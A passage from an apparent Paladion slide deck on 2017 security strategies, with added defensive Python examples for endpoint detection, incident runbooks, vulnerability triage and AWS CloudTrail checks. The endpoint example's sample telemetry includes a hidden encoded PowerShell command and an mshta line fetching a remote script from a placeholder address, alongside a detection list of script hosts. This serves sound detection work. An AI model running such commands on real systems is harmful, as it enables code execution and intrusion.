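    for _day, user, country, mb in events:
        volumes[user].append(mb)
        countries[user].add(country)
    return volumes, countries


def score_day(events, baseline):
    """One alert per user whose day is a volume outlier or contains a rare event."""
    volumes, countries = build_profiles(baseline)
    alerts = []
    for day, user, country, mb in events:
        reasons = []
        z = robust_z(mb, volumes[user]) if volumes[user] else float("inf")
        if abs(z) > Z_LIMIT:
            reasons.append("volume_outlier")
        if country not in countries[user]:          # rare event: never seen for this user
            reasons.append(f"new_country:{country}")
        if reasons:
            alerts.append({"user": user, "day": day, "z": round(z, 1), "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in score_day(TODAY, BASELINE):
        print(alert)
```

On the constructed data, bob's 3200 MB day scores hundreds of MADs above his 200 to 230 MB baseline and comes from a country he has never logged in from, so it raises one alert with both reasons; alice's 44 MB day from her usual country raises none. A flat history (MAD of zero) is the edge case worth handling explicitly: the score is made infinite for any change rather than dividing by zero.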
13. Strategy 2: Endpoint Threat Detection

Organizations have matured in log and network threat monitoring, made possible by the wide adoption of SIEM, IPS and network sandboxing technologies. Advanced attackers are now bypassing these technologies by attacking users and their endpoint devices. DBIR data shows that over 40% of today's breaches are caused by endpoint compromises. Traditional anti-malware technologies can no longer contain these advanced attacks:

• New malware that bypasses signatures and detects sandboxing
• Malware using scripts and batch files
• Account takeovers via social engineering or privilege escalation attacks on endpoints

Organizations will enable the same 24/7 monitoring for endpoints as is done for networks and logs today. This monitoring will continuously search for threat and compromise indicators on endpoints using a combination of rules, signatures, behavior anomalies and peer profiling. 2017 will see large organizations rolling out EDR technologies and services. IDC estimates that over 80% of organizations will have this capability by 2018. Refer to Paladion's report on IST for more details on how to monitor threats at endpoints.
14. Endpoint threat detection and response (diagram)

1. Endpoints with agents installed
2. Paladion ETDR as a service: continuous monitoring on endpoints for data leakage, malware activity, user behaviors and lateral movement
3. Fast, accurate, complete detection at scale
4. Analysis and investigation: IR for alerts; validate, prioritize, mitigate
5. Remediation at scale: fix issues quickly and completely
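Slide 13 names two detection methods that signature-based anti-malware lacks, rules on behaviour and peer profiling, and points at script-based malware as the thing they need to catch. The following added example (not Paladion's ETDR agent or service) shows both over constructed process-creation telemetry in the shape an EDR agent or Sysmon would report (host, parent image, child image, command line): behaviour rules flag an Office application spawning a script host, an encoded PowerShell command line and mshta fetching a remote script, while peer profiling flags any parent-child pair that launches a script host on no more than a tenth of the fleet. Host names, hashes and the command lines are placeholders.

```python
"""Endpoint detection over process-creation telemetry: rules plus peer profiling.

Added example, not the deck's ETDR product. Events are constructed in the
shape of a process-creation record: (host, parent image, child image, cmdline).
"""
import re
from collections import defaultdict

# Constructed telemetry: a macro-driven PowerShell on wks-01, a batch-file
# chain ending in mshta on wks-07, and a benign browser launch on nine hosts.
EVENTS = [
    ("wks-01", "outlook.exe", "winword.exe", "winword.exe /n invoice.docx"),
    ("wks-01", "winword.exe", "powershell.exe",
     "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"),
    ("wks-07", "svchost.exe", "cmd.exe", r"cmd.exe /c copy \\fs01\share\run.bat %TEMP%"),
    ("wks-07", "cmd.exe", "mshta.exe", "mshta.exe http://203.0.113.5/a.hta"),
]
EVENTS += [(f"wks-{n:02d}", "explorer.exe", "chrome.exe", "chrome.exe") for n in range(2, 11)]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "regsvr32.exe", "rundll32.exe"}
# -e / -ec / -enc / -encodedcommand followed by a base64 blob.
ENCODED = re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I)


def rule_findings(parent, child, cmdline):
    """Behaviour rules: which known-bad parent/child or command-line shapes match."""
    hits = set()
    if parent in OFFICE and child in SCRIPT_HOSTS:
        hits.add("office_spawns_script_host")
    if child == "powershell.exe" and ENCODED.search(cmdline):
        hits.add("encoded_powershell")
    if child == "mshta.exe" and re.search(r"https?://", cmdline, re.I):
        hits.add("mshta_remote_script")
    return hits


def peer_profile(events, max_fraction=0.1):
    """Peer profiling: parent->child pairs that launch a script host on at most
    max_fraction of all hosts seen in the telemetry."""
    hosts = {e[0] for e in events}
    pair_hosts = defaultdict(set)
    for host, parent, child, _ in events:
        pair_hosts[(parent, child)].add(host)
    return {pair for pair, seen in pair_hosts.items()
            if pair[1] in SCRIPT_HOSTS and len(seen) / len(hosts) <= max_fraction}


def detect_endpoint(events):
    """Return {host: set of finding names} for hosts with at least one finding."""
    rare = peer_profile(events)
    findings = defaultdict(set)
    for host, parent, child, cmdline in events:
        hits = rule_findings(parent, child, cmdline)
        if (parent, child) in rare:
            hits.add("rare_parent_child")
        if hits:
            findings[host] |= hits
    return dict(findings)


def rank_hosts(findings):
    """Hosts ordered by number of distinct findings, then name, for triage."""
    return sorted(findings, key=lambda h: (-len(findings[h]), h))


if __name__ == "__main__":
    result = detect_endpoint(EVENTS)
    for host in rank_hosts(result):
        print(host, sorted(result[host]))
```

Peer profiling is what catches the svchost-to-cmd launch on wks-07: no rule describes it, but the pair exists on one host out of ten. The fraction threshold should be computed over a population of similar machines (the deck's "peer" group), since a pair that is rare across the whole fleet may be normal on every developer workstation.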
15. Strategy 3: Response Automation and Orchestration

Manual incident response is a time-consuming process. The average time for responses involving triage, incident analysis, containment, recovery and eradication is over 35 days. Furthermore, organizations do not have runbooks for handling common incidents, and end up unprepared for threats.

2017 will see organizations invest in central incident response platforms with automation for the various stages of incident management. Organizations will build or acquire runbooks that integrate with these platforms. The platform will also have analytical capabilities to analyze incidents in depth, uncovering the full blast radius and patient zero of long campaigns. Forrester estimates that over 37% of organizations are currently planning to automate incident response management through analytics. For more details on how to implement this strategy, refer to Paladion's reports on Next Gen SOC and security analytics and orchestration.
16. Response automation across the lifecycle, 24/7 (diagram)

• Alert validation: verify how relevant the alert is in your context and the likelihood of damage
• Incident analysis: investigate the impact, attacker, attack campaign and extent of compromise
• Containment: quickly contain the attack and its impact to stop the spread
• Root mitigation: design security features to remove root causes and prevent repeat breaches
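The runbook idea from slide 15 and the validation and containment stages in the diagram above can be expressed as a small policy engine. The following added example is not Paladion's orchestration platform; it shows the part of such a platform that is decision logic rather than integration: an alert is validated against context (an authorized-scanner allowlist and an asset inventory), prioritized by asset criticality and campaign membership, and then walked through a runbook whose steps carry an approval gate, so a workstation is isolated automatically while a production server waits for a human. Actions are written to a ledger instead of being sent to an EDR or firewall API; the assets, allowlist and runbook are constructed placeholders.

```python
"""Runbook-driven alert handling with validation and an approval gate.

Added example, not the deck's orchestration platform. The asset inventory,
scanner allowlist and runbook are constructed; actions are recorded in a
ledger rather than executed against a real EDR/firewall API.
"""

# Constructed CMDB extract.
ASSETS = {
    "wks-17": {"kind": "workstation", "criticality": "low"},
    "srv-db-02": {"kind": "server", "criticality": "high", "tags": {"production"}},
}
# Constructed: source addresses whose "attacks" are authorized scanning.
SCANNER_ALLOWLIST = {"10.0.9.5"}

# Each step names an action and the gate that decides whether it may run unattended.
RUNBOOKS = {
    "lateral_movement": [
        {"action": "collect_triage_package", "gate": "auto"},
        {"action": "isolate_host", "gate": "auto_unless_production"},
        {"action": "disable_account", "gate": "approval"},
    ],
}


def validate(alert):
    """Alert validation: is this alert relevant in our context at all?"""
    if alert["src_ip"] in SCANNER_ALLOWLIST:
        return False, "source is an authorized scanner"
    if alert["host"] not in ASSETS:
        return False, "unknown asset; route to inventory team"
    if alert["type"] not in RUNBOOKS:
        return False, "no runbook for this alert type; manual handling"
    return True, "validated"


def priority(alert):
    """Asset criticality plus one if the alert is part of a linked campaign."""
    score = {"low": 1, "medium": 2, "high": 3}[ASSETS[alert["host"]]["criticality"]]
    if alert.get("campaign_alerts", 1) > 1:
        score += 1
    return score


def run(alert):
    """Walk the runbook and return the ledger of what was done or is pending."""
    ok, reason = validate(alert)
    ledger = [{"step": "validate", "status": "ok" if ok else "closed", "note": reason}]
    if not ok:
        return ledger
    asset = ASSETS[alert["host"]]
    ledger.append({"step": "prioritize", "status": "ok", "note": f"priority {priority(alert)}"})
    for step in RUNBOOKS[alert["type"]]:
        gate = step["gate"]
        if gate == "approval":
            status = "awaiting_approval"
        elif gate == "auto_unless_production" and "production" in asset.get("tags", set()):
            status = "awaiting_approval"
        else:
            status = "executed"  # here: recorded; a real platform calls the tool API
        ledger.append({"step": step["action"], "status": status, "target": alert["host"]})
    return ledger


if __name__ == "__main__":
    for entry in run({"type": "lateral_movement", "host": "srv-db-02",
                      "src_ip": "203.0.113.9", "campaign_alerts": 4}):
        print(entry)
```

The ledger is the audit trail the deck's "patient zero and blast radius" analysis later reads; keeping gates as data on the runbook steps, rather than in code, is what lets a SOC tighten or relax automation per asset class without a release.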
17. Strategy 4: Digital VM Programs (continuous, automated, intelligence-driven)

Vulnerability management programs in most organizations are slow and cumbersome:

• Automation of test planning, scheduling, reporting, mitigation, analytics generation and distribution is limited.
• Vulnerability results are not prioritized for attack scenarios, i.e. which vulnerability will be exploited in the organization's own context and hence needs faster remediation.
• There is limited threat intelligence gathering and correlation with vulnerabilities.

Digital VM programs aim to automate analytics and threat intelligence so that vulnerability discovery, mitigation and stakeholder collaboration are fast-tracked. This enables VM programs to run continuously, like existing security monitoring programs.

2017 will see organizations implement digital VM programs with a centralized VM platform. Gartner estimates that enterprises that implement a strong vulnerability management process will experience 90% fewer successful attacks. Refer to Paladion's report on this topic. It is time to stop being complacent about vulnerabilities and execute this strategy.

VM cycle (diagram): analytics, discovery, testing, triaging, mitigation
18. Digital VM platform (diagram)

• Components: workflow management, vulnerability analytics, asset aggregator, test manager, security telemetry, triage engine, solution store, policy enforcer
• Roles: test administrators, pentesters, vulnerability analysts, solution SMEs, remediators
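Slide 17's second and third gaps, no prioritization for the organization's own attack scenarios and no correlation with threat intelligence, are what the triage engine in the platform above exists to close. The following added example is not Paladion's triage engine; it combines scanner output with an asset inventory (exposure and criticality) and a threat-intelligence feed (whether a weakness is exploited in the wild or has a public proof of concept) into a contextual score, derives a remediation SLA from the score, and reports what is overdue. The scoring weights and SLA bands are illustrative choices, and the finding ids, assets and intelligence entries are constructed placeholders, not real CVE identifiers.

```python
"""Attack-scenario prioritization of vulnerability findings.

Added example, not the deck's triage engine. Scanner findings, the asset
inventory and the threat-intelligence feed are constructed; finding ids are
placeholders, not CVE identifiers. Weights and SLA bands are illustrative.
"""
from datetime import date, timedelta

# Constructed asset aggregator output.
ASSETS = {
    "web-01": {"exposure": "internet", "criticality": "high"},
    "hr-app-03": {"exposure": "internal", "criticality": "high"},
    "kiosk-12": {"exposure": "internal", "criticality": "low"},
}
# Constructed scanner findings; "weakness" is the key joined against intel.
FINDINGS = [
    {"id": "F-1", "asset": "web-01", "weakness": "W-deser", "cvss": 9.8,
     "found": date(2017, 1, 10), "title": "deserialization RCE in app server"},
    {"id": "F-2", "asset": "hr-app-03", "weakness": "W-sqli", "cvss": 8.6,
     "found": date(2017, 1, 5), "title": "SQL injection in search form"},
    {"id": "F-3", "asset": "kiosk-12", "weakness": "W-browser", "cvss": 7.5,
     "found": date(2017, 1, 3), "title": "outdated browser"},
    {"id": "F-4", "asset": "web-01", "weakness": "W-tls", "cvss": 4.3,
     "found": date(2017, 1, 2), "title": "TLS 1.0 enabled"},
]
# Constructed threat-intelligence feed: weakness -> observed exploitation status.
INTEL = {"W-deser": "exploited_in_wild", "W-browser": "public_poc"}

EXPOSURE_WEIGHT = {"internet": 2.0, "partner": 1.5, "internal": 1.0}
CRITICALITY_WEIGHT = {"high": 1.5, "medium": 1.0, "low": 0.5}
EXPLOIT_WEIGHT = {"exploited_in_wild": 2.0, "public_poc": 1.5, "none": 1.0}
SLA_BANDS = [(40.0, 7), (10.0, 30), (0.0, 90)]  # minimum score -> days to fix


def score(finding, assets=ASSETS, intel=INTEL):
    """CVSS base scaled by where the asset sits, what it is worth and whether
    attackers are known to use this weakness."""
    asset = assets[finding["asset"]]
    status = intel.get(finding["weakness"], "none")
    return (finding["cvss"] * EXPOSURE_WEIGHT[asset["exposure"]]
            * CRITICALITY_WEIGHT[asset["criticality"]] * EXPLOIT_WEIGHT[status])


def sla_days(s):
    for threshold, days in SLA_BANDS:
        if s >= threshold:
            return days
    return SLA_BANDS[-1][1]


def triage(findings, assets=ASSETS, intel=INTEL):
    """Prioritized rows with score, SLA and ISO due date, highest score first."""
    rows = []
    for f in findings:
        s = score(f, assets, intel)
        days = sla_days(s)
        rows.append({"id": f["id"], "asset": f["asset"], "score": s, "sla_days": days,
                     "due": (f["found"] + timedelta(days=days)).isoformat(),
                     "exploit_status": intel.get(f["weakness"], "none")})
    rows.sort(key=lambda r: (-r["score"], r["id"]))
    return rows


def overdue(rows, today_iso):
    """Ids whose due date is strictly before today (ISO dates compare as strings)."""
    return [r["id"] for r in rows if r["due"] < today_iso]


if __name__ == "__main__":
    for r in triage(FINDINGS):
        print(f"{r['id']} {r['asset']:<10} score={r['score']:5.1f} "
              f"sla={r['sla_days']:>2}d due={r['due']} ({r['exploit_status']})")
```

The point the deck makes is visible in the output: the internet-facing deserialization flaw that intelligence says is exploited in the wild gets a seven-day SLA, while the higher-CVSS-than-TLS SQL injection on an internal system and the weak TLS setting on the public host land in the same thirty-day band, and the kiosk browser, despite a public proof of concept, waits ninety days. Running this on every scan import, rather than quarterly, is what turns VM into the continuous program slide 17 describes.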
19. Strategy 5: Security for CloudOps and DevOps

Organizations moving their development, testing and production systems to the cloud will look to integrate security into their CloudOps and DevOps. DoS attacks are already happening in the cloud. It is APT-style attacks that will be difficult to detect in a cloud environment, and these can potentially affect multiple tenants simultaneously.

The two main requirements for security will be:

• Speed of controls, given that CloudOps and DevOps are both highly automated in provisioning resources, changing configurations, and deploying systems and users
• Seamless use of cloud technologies such as the native APIs of cloud providers, configuration management systems such as Chef/Puppet, and ChatOps systems such as Slack

Securing CloudOps and DevOps needs tools that are built differently, whether for security monitoring, vulnerability testing, configuration reviews, or identity and user activity monitoring. In 2017, organizations will adopt new security architectures and practices to secure cloud assets and a more agile development environment. They will then look at integrating these security processes into their traditional on-premise security management systems for an integrated view.
20. Cloud security architecture (diagram)

Sources: CloudTrail, FlowLogs, CloudWatch, IAM, Docker, Amazon console, Windows servers, Unix servers, scanners and automation scripts feed a collector and network threat module in the cloud security platform, which in turn feeds the on-premise SOCs.
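Slide 19's "speed of controls" and "native APIs of cloud providers" requirements come together in the CloudTrail source shown in the diagram above: the collector sees every API call as it lands, so identity and configuration abuse can be detected in minutes rather than at the next review. The following added example is not Paladion's cloud security platform; it applies three checks to records constructed in the CloudTrail record shape (console sign-in without MFA, attachment of the AdministratorAccess managed policy, and a security group rule that opens a management port to the whole internet). User names, group ids and the account id are placeholders.

```python
"""Detections over AWS CloudTrail records for a CloudOps environment.

Added example, not the deck's cloud security platform. Records are
constructed in the CloudTrail record shape; user names, security-group ids
and the account id are placeholders.
"""
import ipaddress

RECORDS = [
    {"eventSource": "signin.amazonaws.com", "eventName": "ConsoleLogin",
     "userIdentity": {"type": "IAMUser", "userName": "bob"},
     "responseElements": {"ConsoleLogin": "Success"},
     "additionalEventData": {"MFAUsed": "No"}},
    {"eventSource": "signin.amazonaws.com", "eventName": "ConsoleLogin",
     "userIdentity": {"type": "IAMUser", "userName": "alice"},
     "responseElements": {"ConsoleLogin": "Success"},
     "additionalEventData": {"MFAUsed": "Yes"}},
    {"eventSource": "iam.amazonaws.com", "eventName": "AttachUserPolicy",
     "userIdentity": {"type": "IAMUser", "userName": "ci-bot"},
     "requestParameters": {"userName": "deploy",
                           "policyArn": "arn:aws:iam::aws:policy/AdministratorAccess"}},
    {"eventSource": "ec2.amazonaws.com", "eventName": "AuthorizeSecurityGroupIngress",
     "userIdentity": {"type": "AssumedRole",
                      "arn": "arn:aws:sts::123456789012:assumed-role/ops/dave"},
     "requestParameters": {"groupId": "sg-0abc", "ipPermissions": {"items": [
         {"ipProtocol": "tcp", "fromPort": 22, "toPort": 22,
          "ipRanges": {"items": [{"cidrIp": "0.0.0.0/0"}]}}]}}},
    {"eventSource": "ec2.amazonaws.com", "eventName": "AuthorizeSecurityGroupIngress",
     "userIdentity": {"type": "IAMUser", "userName": "dave"},
     "requestParameters": {"groupId": "sg-0def", "ipPermissions": {"items": [
         {"ipProtocol": "tcp", "fromPort": 443, "toPort": 443,
          "ipRanges": {"items": [{"cidrIp": "10.0.0.0/8"}]}}]}}},
]

ADMIN_POLICY_ARNS = {"arn:aws:iam::aws:policy/AdministratorAccess"}
MGMT_PORTS = {22, 3389}
ATTACH_EVENTS = {"AttachUserPolicy", "AttachRolePolicy", "AttachGroupPolicy"}


def principal(rec):
    """Who made the call: IAM user name, else the (assumed-role) ARN."""
    ident = rec.get("userIdentity", {})
    return ident.get("userName") or ident.get("arn", "unknown")


def check_console_login(rec):
    if rec.get("eventName") != "ConsoleLogin":
        return None
    if rec.get("responseElements", {}).get("ConsoleLogin") != "Success":
        return None
    if rec.get("additionalEventData", {}).get("MFAUsed") == "Yes":
        return None
    return "console_login_without_mfa", f"{principal(rec)} signed in without MFA"


def check_admin_policy(rec):
    if rec.get("eventName") not in ATTACH_EVENTS:
        return None
    params = rec.get("requestParameters", {})
    if params.get("policyArn") not in ADMIN_POLICY_ARNS:
        return None
    target = params.get("userName") or params.get("roleName") or params.get("groupName")
    return "admin_policy_attached", f"{principal(rec)} attached {params['policyArn']} to {target}"


def check_open_security_group(rec):
    if rec.get("eventName") != "AuthorizeSecurityGroupIngress":
        return None
    params = rec.get("requestParameters", {})
    for perm in params.get("ipPermissions", {}).get("items", []):
        all_ports = perm.get("ipProtocol") == "-1"  # "-1" means every protocol/port
        lo, hi = perm.get("fromPort", 0), perm.get("toPort", 65535)
        exposes_mgmt = all_ports or any(lo <= p <= hi for p in MGMT_PORTS)
        for rng in perm.get("ipRanges", {}).get("items", []):
            net = ipaddress.ip_network(rng["cidrIp"], strict=False)
            if net.prefixlen == 0 and exposes_mgmt:
                return ("sg_open_to_world",
                        f"{principal(rec)} opened {params.get('groupId')} "
                        f"to {rng['cidrIp']} on ports {lo}-{hi}")
    return None


CHECKS = (check_console_login, check_admin_policy, check_open_security_group)


def detect_cloudtrail(records):
    """Run every check over every record; return findings in record order."""
    findings = []
    for rec in records:
        for check in CHECKS:
            hit = check(rec)
            if hit:
                findings.append({"rule": hit[0], "principal": principal(rec),
                                 "detail": hit[1], "eventSource": rec.get("eventSource")})
    return findings


if __name__ == "__main__":
    for f in detect_cloudtrail(RECORDS):
        print(f"[{f['rule']}] {f['detail']}")
```

In a real pipeline the records would arrive from the CloudTrail S3 delivery or a CloudWatch Logs subscription and the findings would be forwarded to the on-premise SOC shown in the diagram; the checks themselves are the "differently built" tooling slide 19 calls for, since they read the provider's own event format rather than a network tap.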
21. Contact us today to combat today's sophisticated cyber threats. Visit www.paladion.net or e-mail sales@paladion.net.

Editor's Notes

1. Non-perimeter assets: mobile/remote, cloud, customers and partners